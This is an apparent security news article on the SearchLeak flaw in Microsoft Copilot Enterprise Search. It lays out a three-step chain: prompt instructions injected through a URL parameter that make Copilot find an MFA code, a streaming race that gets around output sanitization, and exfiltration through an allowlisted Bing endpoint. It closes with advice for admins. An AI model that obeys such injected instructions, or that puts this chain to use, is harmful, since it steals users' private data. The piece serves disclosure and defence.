How the SearchLeak Vulnerability Chained Prompt Injection and Classic Bugs to Turn One Click into Data Theft

Why SearchLeak Matters

SearchLeak wasn't a single catastrophic bug. It was a chain of three smaller weaknesses, each one carefully exploited in sequence. Alone, none of them would have been a crisis. Together, they formed a silent one-click exfiltration pipeline that could reach anything the signed-in user could access through Microsoft Graph: emails, calendar invites, meeting notes, SharePoint documents, and OneDrive files .

Crucially, it underscored a pattern security researchers had been warning about. In January 2026, the same lab at Varonis disclosed Reprompt, a near-identical one-click attack against the consumer-facing Copilot Personal . Even earlier, in June 2025, Aim Security had revealed EchoLeak, a zero-click vulnerability that weaponized a prompt injection embedded in a malicious document . The arrival of SearchLeak demonstrated that enterprise-grade guardrails hadn't eliminated the underlying risk class—they'd only raised the bar for attackers to get creative.

The Three-Bug Chain

Each link in the SearchLeak chain is instructive on its own, but their combined effect is what made the attack so potent.

Stage 1: Parameter-to-Prompt Injection

Copilot Enterprise Search accepts a URL parameter—q—that contains the user's natural-language query. Varonis researchers found that the parameter didn't just accept a search phrase; it accepted arbitrary prompt instructions .

An attacker could craft a URL that, when loaded by an authenticated user, instructed Copilot to do something entirely different from what the link appeared to show. For example, a link could tell the AI to search the victim's mailbox for a one-time MFA code, embed that code in an image URL, and append it to the response. The victim saw a Microsoft-branded search page. Copilot silently obeyed the injected prompt .

This technique, which Varonis calls Parameter-to-Prompt (P2P) injection, was the same mechanism at the heart of the earlier Reprompt attack against Copilot Personal .

Stage 2: A Race Condition That Bypasses Sanitization

When Copilot generates output that includes HTML markup (like an <img> tag), a server-side sanitizer is supposed to wrap the output in code blocks so the browser treats it as harmless plaintext. The problem? The wrapping only happens after the content is fully generated .

The browser, however, starts rendering the response while it's still streaming in. An attacker's injected <img> tag therefore fires its request as soon as it appears in the stream—before the sanitizer even runs. By the time the code block appears, the image URL has already been requested, and the data encoded in its path has already left the victim's browser .

This is a classic race condition turned lethal by the context of AI-generated content. An older defense mechanism hadn't been redesigned for a world where the AI output itself is attacker-controlled.

Stage 3: Exfiltration Through a CSP-Allowlisted Bing Endpoint

Even with the earlier two stages in place, a final roadblock existed: the Content Security Policy (CSP) on Microsoft's m365.cloud.microsoft domain blocks images from arbitrary external servers. However, *.bing.com is allowlisted .

Bing's "Search by Image" endpoint lets a URL be fetched server-side. In the SearchLeak exploit, the attacker appended the stolen data as part of the image search path (e.g.,

https://www.bing.com/images/search?q=/Your_Security_Code_847291/img.png

The attacker simply monitored the logs of their own image endpoint, which Bing's server had been tricked into hitting.

The Deceptive Simplicity of a Single Click

The entire chain executed automatically. A victim clicked a link. Copilot searched their own data. The output streamed to the browser. An <img> tag fired. Bing's server fetched the attacker's URL. The data was exfiltrated. All of this happened before the user's browser had finished rendering the page.

The attack was hard to detect because:

• The URL was on a trusted Microsoft domain, evading URL scanners and reputation checks .
• No authentication dialog or second click was triggered—the victim's existing session was used.
• All outbound requests went to allowlisted Microsoft infrastructure.

The data that could be stolen wasn't theoretical. Researchers highlighted one-time MFA codes and password-reset links that remain valid for minutes, along with calendar details and sensitive documents indexed by Copilot .

The Severity Puzzle: Critical, but What Score?

CVE-2026-42824 sparked a brief debate over severity ratings. Microsoft assigned the vulnerability its highest internal severity label—Critical—but issued a CVSS v3.1 base score of 6.5 (Medium). The reasoning: the attack required user interaction (the single click), which reduced the score .

Some sources reported a 7.5 (High) score from the National Vulnerability Database (NVD) . In practice, however, multiple reviews including TNW's analysis noted that both the Microsoft CSAF record and the NVD entry reflected an identical 6.5 vector . The perception of a higher score may have come from independent analysts calculating under wider impact assumptions or echoing early reporting.

Regardless of the number, the consensus was clear: a single click could expose an organization's most sensitive data.

The Copilot Vulnerability Lineage

SearchLeak didn't appear in a vacuum. It joined two other landmark AI-exfiltration discoveries:

• EchoLeak (CVE-2025-32711) — June 2025. A zero-click vulnerability from Aim Security that used a prompt injection embedded in a document Copilot automatically processed. No user interaction required at all. CVSS 9.3 .
• Reprompt — January 2026. Varonis showed that the consumer-grade Copilot Personal could be hijacked with the same P2P injection technique. No malware, no plugin, just a crafted URL .

The through-line is prompt injection, a threat that turns the AI's core capability—following instructions—into an attack surface. Each subsequent vulnerability has shown that patching one surface (Consumer vs. Enterprise) or adding guardrails (document processing vs. search queries) doesn't eliminate the class; it only redirects attacker creativity .

What Tenant Admins Should Do Now

SearchLeak itself is patched and requires no customer action. But the technique isn't going away, and security teams should operationalize the lessons.

Monitor Copilot Search URLs. The q parameter is still exposed. Look for encoded HTML, script-like payloads, or suspiciously long instruction strings in Copilot Enterprise Search URLs flowing through your proxy logs .

Watch for anomalous outbound requests to Bing image endpoints. A user suddenly generating multiple requests to *.bing.com with unusual image search paths—especially patterns that resemble encoded or exfiltrated data—should raise alarms .

Limit Copilot's indexed surface. Practice least-privilege data governance. Constrain which SharePoint sites, OneDrive folders, and mailboxes Copilot can index so that a future vulnerability doesn't equate to the theft of everything the user can reach. Regularly audit and reduce Copilot's Microsoft Graph permissions .

The SearchLeak disclosure was not a story about a single patch, but a warning about the evolving intersection of prompt injection and classic web vulnerabilities. As organizations adopt AI copilots with deep access to their data, security models that treat AI output as trusted content must be reconsidered. The next chain won't use the same three bugs—but it will almost certainly reuse the same pattern.